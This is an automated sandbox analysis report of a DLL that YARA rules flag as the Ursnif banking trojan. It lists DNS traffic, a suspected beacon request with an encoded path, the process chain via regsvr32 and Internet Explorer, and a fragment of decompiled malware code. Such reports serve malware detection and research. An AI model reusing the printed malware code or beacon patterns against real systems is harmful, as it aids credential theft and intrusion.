                                                                                                                                                                                            Dec 18, 2020 14:12:59.392935991 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:12:59.405561924 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:00.317727089 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:00.336256981 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:00.579071045 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:00.591397047 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:01.268899918 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:01.282280922 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:01.468282938 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:01.481048107 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:01.824440956 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:01.837147951 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:01.848615885 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:01.867904902 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:02.332824945 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:02.346129894 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:03.148809910 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:03.183073044 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:03.493608952 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:03.511646032 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:03.892632961 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:03.905195951 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:04.210760117 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:04.229487896 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:04.827174902 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:04.840198040 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:05.302382946 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:05.317104101 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:05.594415903 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:05.632294893 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:05.801619053 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:05.821804047 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:06.093138933 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:06.106036901 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:07.136343002 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:07.149703979 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:08.261420012 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:08.274377108 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:19.733490944 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:19.746946096 CET53649108.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:21.767121077 CET5212353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:21.781210899 CET53521238.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:28.892179966 CET5613053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:28.910985947 CET53561308.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:29.192367077 CET5633853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:29.261899948 CET53563388.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:30.310468912 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:30.323498011 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:31.023255110 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:31.035799980 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:31.315843105 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:31.328753948 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:32.055376053 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:32.068851948 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:32.322846889 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:32.335551023 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:33.057634115 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:33.071352959 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:34.322217941 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:34.334813118 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:35.073451996 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:35.087013960 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:38.344783068 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:38.359035015 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:39.079453945 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:39.092673063 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:41.185400963 CET6397853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:41.212205887 CET53639788.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:41.799900055 CET6293853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:41.813910961 CET53629388.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:44.207568884 CET5570853192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:44.221221924 CET53557088.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:13:57.803179979 CET5680353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:13:57.816111088 CET53568038.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:01.495110035 CET5714553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:01.514985085 CET53571458.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:11.491308928 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:11.504441023 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:12.493263960 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:12.506726027 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:13.493088007 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:13.506443977 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:15.508817911 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:15.522392035 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:19.521871090 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:19.535240889 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:32.528558016 CET5830653192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:32.541232109 CET53583068.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:14:34.437660933 CET6412453192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:14:34.463964939 CET53641248.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:47.036509991 CET4936153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:47.049665928 CET53493618.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:47.637063026 CET6315053192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:47.650206089 CET53631508.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:48.416157007 CET5327953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:48.429778099 CET53532798.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:48.788242102 CET5688153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:48.801867008 CET53568818.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:49.254389048 CET5364253192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:49.267417908 CET53536428.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:49.888550043 CET5566753192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:49.902236938 CET53556678.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:51.449618101 CET5483353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:51.503444910 CET53548338.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:52.279164076 CET6247653192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:52.292212963 CET53624768.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:53.267741919 CET4970553192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:53.281311035 CET53497058.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:15:53.778182983 CET6147753192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:15:53.791953087 CET53614778.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:16:06.746768951 CET6163353192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:16:06.760502100 CET53616338.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:16:28.161242008 CET5594953192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:16:28.188889027 CET53559498.8.8.8192.168.2.3
                                                                                                                                                                                            Dec 18, 2020 14:16:42.251888037 CET5760153192.168.2.38.8.8.8
                                                                                                                                                                                            Dec 18, 2020 14:16:42.265067101 CET53576018.8.8.8192.168.2.3

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Dec 18, 2020 14:13:01.468282938 CET192.168.2.38.8.8.80xa3ddStandard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:03.148809910 CET192.168.2.38.8.8.80xb2d3Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:03.493608952 CET192.168.2.38.8.8.80x5d82Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:04.210760117 CET192.168.2.38.8.8.80x13c8Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:05.302382946 CET192.168.2.38.8.8.80x2d16Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:05.801619053 CET192.168.2.38.8.8.80x47a2Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:06.093138933 CET192.168.2.38.8.8.80x8cf5Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:41.799900055 CET192.168.2.38.8.8.80x3057Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:16:06.746768951 CET192.168.2.38.8.8.80xbb81Standard query (0)gstatistics.coA (IP address)IN (0x0001)

                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                            Dec 18, 2020 14:13:01.481048107 CET8.8.8.8192.168.2.30xa3ddNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:03.183073044 CET8.8.8.8192.168.2.30xb2d3No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:03.511646032 CET8.8.8.8192.168.2.30x5d82No error (0)contextual.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:04.229487896 CET8.8.8.8192.168.2.30x13c8No error (0)lg3.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:05.317104101 CET8.8.8.8192.168.2.30x2d16No error (0)hblg.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:05.821804047 CET8.8.8.8192.168.2.30x47a2No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:06.106036901 CET8.8.8.8192.168.2.30x8cf5No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:06.106036901 CET8.8.8.8192.168.2.30x8cf5No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:41.813910961 CET8.8.8.8192.168.2.30x3057No error (0)ocsp.sca1b.amazontrust.com65.9.70.182A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:41.813910961 CET8.8.8.8192.168.2.30x3057No error (0)ocsp.sca1b.amazontrust.com65.9.70.113A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:41.813910961 CET8.8.8.8192.168.2.30x3057No error (0)ocsp.sca1b.amazontrust.com65.9.70.13A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:13:41.813910961 CET8.8.8.8192.168.2.30x3057No error (0)ocsp.sca1b.amazontrust.com65.9.70.177A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:16:06.760502100 CET8.8.8.8192.168.2.30xbb81No error (0)gstatistics.co95.181.198.158A (IP address)IN (0x0001)
                                                                                                                                                                                            Dec 18, 2020 14:16:06.760502100 CET8.8.8.8192.168.2.30xbb81No error (0)gstatistics.co185.186.142.136A (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.34975965.9.70.18280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Dec 18, 2020 14:13:41.850676060 CET2220OUTGET /images/jhYAn3wKHkyVTfw0/00VSw8f6pL0WGBk/m4PqAGyanFhkbyBOYl/qp5aS987V/V_2F_2BDl1vlB4fNYU_2/F2MBpXT1koABcUI5eof/xLEdBGKD7jA0v_2Fz7BWKv/3L_2BuB2pgeH4/HkdTjRHb/hcfpV3qoBZMqxjVhpVXAZkF/kYfRQAAcy4/xtA2JR23ptN8RGY98/Uvv3IGmm/Pvn0.avi HTTP/1.1
                                                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Dec 18, 2020 14:13:42.110357046 CET2223INHTTP/1.1 200 OK
                                                                                                                                                                                            Content-Type: application/ocsp-response
                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=300
                                                                                                                                                                                            Date: Fri, 18 Dec 2020 13:13:41 GMT
                                                                                                                                                                                            ETag: "5f4e9b00-5"
                                                                                                                                                                                            Last-Modified: Tue, 01 Sep 2020 19:03:28 GMT
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                                                            Via: 1.1 6b38a2e1db230db568190464ab7177db.cloudfront.net (CloudFront)
                                                                                                                                                                                            X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                            X-Amz-Cf-Id: gvFUMWVgBc0Y9AcLNWZmsPoYfL45PrrVb4DEf2i8qtzXUGl-BCbGsA==
                                                                                                                                                                                            Data Raw: 30 03 0a 01 06
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:12:59
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:loaddll32.exe 'C:\Users\user\Desktop\p1cture3.dll'
                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                            File size:120832 bytes
                                                                                                                                                                                            MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:12:59
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\p1cture3.dll
                                                                                                                                                                                            Imagebase:0x1280000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246124544.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246050953.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.246026910.0000000004C08000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:12:59
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:13:00
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Imagebase:0x7ff7cb010000
                                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:13:00
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17410 /prefetch:2
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:13:04
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17418 /prefetch:2
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:14:13:41
                                                                                                                                                                                            Start date:18/12/2020
                                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17432 /prefetch:2
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E00DF32BA(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				CHAR* _v20;
                                                                                                                                                                                              				struct _FILETIME _v28;
                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                              				char* _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				long _v344;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                                                              				CHAR* _t83;
                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                              				signed char _t89;
                                                                                                                                                                                              				signed char _t91;
                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				long _t99;
                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				char* _t111;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				int _t119;
                                                                                                                                                                                              				char _t128;
                                                                                                                                                                                              				void* _t134;
                                                                                                                                                                                              				signed int _t136;
                                                                                                                                                                                              				char* _t139;
                                                                                                                                                                                              				signed int _t140;
                                                                                                                                                                                              				char* _t141;
                                                                                                                                                                                              				char* _t146;
                                                                                                                                                                                              				signed char* _t148;
                                                                                                                                                                                              				int _t151;
                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                              				void* _t153;
                                                                                                                                                                                              				void* _t154;
                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              				_t148 = __eax;
                                                                                                                                                                                              				_t72 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              				_t74 = RtlAllocateHeap( *0xdfd238, 0, _t72 ^ 0x59935b44);
                                                                                                                                                                                              				_v20 = _t74;
                                                                                                                                                                                              				if(_t74 == 0) {
                                                                                                                                                                                              					L36:
                                                                                                                                                                                              					return _v12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t76 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              				_t78 = RtlAllocateHeap( *0xdfd238, 0, _t76 ^ 0x59935a4d);
                                                                                                                                                                                              				_t146 = 0;
                                                                                                                                                                                              				_v36 = _t78;
                                                                                                                                                                                              				if(_t78 == 0) {
                                                                                                                                                                                              					L35:
                                                                                                                                                                                              					HeapFree( *0xdfd238, _t146, _v20);
                                                                                                                                                                                              					goto L36;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t136 =  *0xdfd2a0; // 0x59935a40
                                                                                                                                                                                              				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                                                                                                                                                                              				_t81 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t154 = _t153 + 0xc;
                                                                                                                                                                                              				_t5 = _t81 + 0xdfe7e8; // 0x73797325
                                                                                                                                                                                              				_t83 = E00DF77E6(_t5);
                                                                                                                                                                                              				_v20 = _t83;
                                                                                                                                                                                              				if(_t83 == 0) {
                                                                                                                                                                                              					L34:
                                                                                                                                                                                              					HeapFree( *0xdfd238, _t146, _v36);
                                                                                                                                                                                              					goto L35;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                              				_v28.dwLowDateTime = 0x59935a4d;
                                                                                                                                                                                              				_v28.dwHighDateTime = 0x59935a4d;
                                                                                                                                                                                              				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                              				_v32 = _t85;
                                                                                                                                                                                              				if(_t85 != 0x59935a4d) {
                                                                                                                                                                                              					GetFileTime(_t85,  &_v28, 0, 0);
